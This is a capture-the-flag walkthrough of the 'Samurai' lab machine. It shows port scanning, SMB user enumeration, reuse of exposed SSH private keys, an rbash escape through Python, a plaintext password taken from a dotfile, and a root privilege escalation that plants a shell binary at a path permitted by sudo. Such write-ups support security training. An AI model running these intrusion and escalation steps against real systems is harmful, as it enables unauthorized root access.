# Samurai ## Nmap ``` sudo nmap 192.168.104.90 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http nginx 1.14.2 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 7080/tcp open ssl/empowerid LiteSpeed 7601/tcp open http Apache httpd 2.4.38 ((Debian)) 8088/tcp open http LiteSpeed httpd Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` Starting off on this machine we find that port 80 is restricted by a HTTP-basic-auth login. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f94b92f70d06af6e0197842531883f3572d324f6%2Fimage.png?alt=media) I decided against bruteforcing for the moment and move straight on to other ports on the machine. Looking at port 445 for SMB I run enum4linux against the target and discovered some user accounts. ``` enum4linux -u '' -p '' -a 192.168.104.90 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-65bff422744edef8f8eac78f4eaaad865c5b10ba%2Fimage.png?alt=media) We have discovered the following users:\\ * seppuku * samurai * tanto Otherwise with no open shares on SMB we move onto enumerating port 7601 of which in the browser takes us to the following below: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-590d0a69b2bf47014eb85404f2a63f5ea1aabdee%2Fimage.png?alt=media) Running `dirsearch.py` against this port reveals the /keys/ directory. ``` python3 dirsearch.py -u http://192.168.104.90:7601 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60 --full-url ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3e10d29319cce5d0e6f279402770b3ef2937603%2Fimage.png?alt=media) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2e97bf97f0e6071689dceba20ae28baec4a7c3f1%2Fimage.png?alt=media) Private and private.bak contain RSA keys. I moved the key over to my desktop, renamed to id\_rsa and used `chmod` to set appropriate permissions. ``` chmod 600 id_rsa ``` Knowing of the three users on the target machine we can guess and login to `SSH`. I was able to login with the user tanto. ``` ssh -i id_rsa tanto@192.168.172.90 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-92391f887ac4961b1822f4828d1c5cabad0a455e%2Fimage.png?alt=media) Once logged in as tanto we see we are restricted in `rbash` and unable to run some commands. I used the following command sequence to first escape `rbash` then export a new path then finally updated to a Python shell again. ``` python -c 'import os; os.system("/bin/sh")' PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin python -c 'import pty; pty.spawn("/bin/bash")' ``` Once we can move around the box again I moved into the seppuku users directory. The file .passwd is of interest and contains the password: `12345685213456!@!@A` This password did not work for the user seppku but I was able to use `su` and the password to login as the user samurai. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9348340ef9ddba0f2f954c86f1471cf85e3062f0%2Fimage.png?alt=media) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-779a4710d943cb8fa0553a3723a4000d62e1bd52%2Fimage.png?alt=media) I then transferred linpeas over to the attacking machine which soon picked up sudo permissions. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c310e3ce01b3dc327d0410d348ad3ac1b3e6514d%2Fimage.png?alt=media) Open another tab and log in as tanto on `SSH` again. The create the directory and file so we can execute as the user samurai. Once the directory and bin file has been created echo in a bash shell then `chmod` to make it executable. ``` mkdir .cgi_bin cd .cgi_bin echo '/bin/bash' > bin chmod 755 bin ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-15ab798795be833b2645ea47b8f2d6fea7c260c3%2Fimage.png?alt=media) Then on our other tab execute the file with the following command to gain root shell: ``` sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/* ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-065b28aa101124f0b5b8dcb5fc7d8d9d177693d7%2Fimage.png?alt=media)